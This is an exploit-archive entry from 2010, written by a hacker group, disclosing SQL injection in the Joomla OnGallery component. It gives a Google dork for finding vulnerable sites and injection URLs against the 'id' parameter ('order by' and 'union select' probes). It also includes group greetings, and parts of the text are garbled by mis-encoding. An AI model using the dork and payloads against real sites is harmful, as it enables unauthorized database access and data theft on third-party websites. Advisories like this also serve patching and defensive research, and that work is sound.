[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Joomla Component OnGallery SQL Injection Vulnerability
# Published : 2010-08-16
# Author : al bayraqim
# Previous Title : Apache JackRabbit 2.0.0 webapp XPath Injection
# Next Title : ACollab Multiple Vulnerabilities
===================================================
Joomla Component (com_ongallery) SQL Injection Vulnerability
===================================================
Author : _aL_Bayraqim_
Homepage : http://www.1923turk.com
BORDO BEREL?LER GRUP KOMUTANLIGI
..! _al_bayragim_ ..! ..! Corti ..! ..! Aytug_Han ..! ..! Montesque ..! ..! Em3rGeNcY ..!...!..KaraBulut....!..!...Ramses....!....!...M¨¹ cahit...!
===================================================
[+]G00gle Dork :index.php?option=com_ongallery
[+] Vulnerable File :
http://site.com/index.php?option=com_ongallery&task=ft&id=-1[SQL]
[+] ExploiT :
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
http://site.com/index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
===================================================
?eHiT GeLdi ?L¨¹mL¨¹ YaLan, GiTTi ?L¨¹mS¨¹zL¨¹g¨¹ Ger?ek. Siz HaYaT S¨¹Ren Le?Ler, SiZi Kim DiRiLTecek?..
===================================================
Greetz : 1923Turk All Users